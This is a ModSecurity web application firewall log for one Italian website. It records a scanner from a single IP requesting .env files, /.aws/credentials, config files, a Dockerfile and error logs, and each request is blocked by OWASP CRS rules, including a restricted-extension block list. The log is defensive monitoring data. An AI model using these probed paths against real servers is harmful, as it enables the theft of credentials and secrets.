[Sat Nov 29 05:39:39.509989 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSp5C_f8q--fJYmSMAuF-QAAAAk"]
[Sat Nov 29 05:39:39.510174 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/v1/.env"] [unique_id "aSp5C_f8q--fJYmSMAuF-QAAAAk"]
[Sat Nov 29 05:39:39.683186 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSp5C9zvgQgSrnIGPhRUfAAAAAo"]
[Sat Nov 29 05:39:39.683486 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSp5C9zvgQgSrnIGPhRUfAAAAAo"]
[Sat Nov 29 05:39:39.683734 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/administrator/.env"] [unique_id "aSp5C9zvgQgSrnIGPhRUfAAAAAo"]
[Sat Nov 29 05:39:39.990935 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSp5Cw31ShYAI8brU4C45gAAAAA"]
[Sat Nov 29 05:39:39.991188 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSp5Cw31ShYAI8brU4C45gAAAAA"]
[Sat Nov 29 05:39:39.991377 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aSp5Cw31ShYAI8brU4C45gAAAAA"]
[Sat Nov 29 05:39:40.816960 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSp5DNzvgQgSrnIGPhRUfQAAAAo"]
[Sat Nov 29 05:39:40.817337 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSp5DNzvgQgSrnIGPhRUfQAAAAo"]
[Sat Nov 29 05:39:40.817560 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/app.config"] [unique_id "aSp5DNzvgQgSrnIGPhRUfQAAAAo"]
[Sat Nov 29 05:39:41.650198 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSp5DdzvgQgSrnIGPhRUfgAAAAo"]
[Sat Nov 29 05:39:41.650581 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSp5DdzvgQgSrnIGPhRUfgAAAAo"]
[Sat Nov 29 05:39:41.650800 2025] [:error] [pid 398576] [client 3.96.137.215:60326] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.config"] [unique_id "aSp5DdzvgQgSrnIGPhRUfgAAAAo"]
[Sat Nov 29 05:39:41.922020 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSp5DQ31ShYAI8brU4C46QAAAAA"]
[Sat Nov 29 05:39:41.922248 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSp5DQ31ShYAI8brU4C46QAAAAA"]
[Sat Nov 29 05:39:41.922485 2025] [:error] [pid 398278] [client 3.96.137.215:60202] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/config.yml"] [unique_id "aSp5DQ31ShYAI8brU4C46QAAAAA"]
[Sat Nov 29 05:39:42.745648 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSp5Dvf8q--fJYmSMAuF_AAAAAk"]
[Sat Nov 29 05:39:42.745869 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSp5Dvf8q--fJYmSMAuF_AAAAAk"]
[Sat Nov 29 05:39:42.746064 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aSp5Dvf8q--fJYmSMAuF_AAAAAk"]
[Sat Nov 29 05:39:46.578287 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSp5Evf8q--fJYmSMAuF_wAAAAk"]
[Sat Nov 29 05:39:46.578543 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSp5Evf8q--fJYmSMAuF_wAAAAk"]
[Sat Nov 29 05:39:46.578757 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aSp5Evf8q--fJYmSMAuF_wAAAAk"]
[Sat Nov 29 05:39:48.610306 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSp5FPf8q--fJYmSMAuGAQAAAAk"]
[Sat Nov 29 05:39:48.610632 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSp5FPf8q--fJYmSMAuGAQAAAAk"]
[Sat Nov 29 05:39:48.610795 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/error.log"] [unique_id "aSp5FPf8q--fJYmSMAuGAQAAAAk"]
[Sat Nov 29 05:39:48.890160 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSp5FEEtJ9CmhQWZAbNCXQAAAAI"]
[Sat Nov 29 05:39:48.890618 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSp5FEEtJ9CmhQWZAbNCXQAAAAI"]
[Sat Nov 29 05:39:48.890872 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_error.log"] [unique_id "aSp5FEEtJ9CmhQWZAbNCXQAAAAI"]
[Sat Nov 29 05:39:49.303700 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSp5FUEtJ9CmhQWZAbNCXgAAAAI"]
[Sat Nov 29 05:39:49.304030 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSp5FUEtJ9CmhQWZAbNCXgAAAAI"]
[Sat Nov 29 05:39:49.304303 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSp5FUEtJ9CmhQWZAbNCXgAAAAI"]
[Sat Nov 29 05:39:49.850653 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSp5Fff8q--fJYmSMAuGAgAAAAk"]
[Sat Nov 29 05:39:49.850916 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSp5Fff8q--fJYmSMAuGAgAAAAk"]
[Sat Nov 29 05:39:49.851126 2025] [:error] [pid 398575] [client 3.96.137.215:60484] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSp5Fff8q--fJYmSMAuGAgAAAAk"]
[Sat Nov 29 05:39:50.302261 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSp5FkEtJ9CmhQWZAbNCXwAAAAI"]
[Sat Nov 29 05:39:50.302585 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSp5FkEtJ9CmhQWZAbNCXwAAAAI"]
[Sat Nov 29 05:39:50.302830 2025] [:error] [pid 398280] [client 3.96.137.215:37602] [client 3.96.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSp5FkEtJ9CmhQWZAbNCXwAAAAI"]
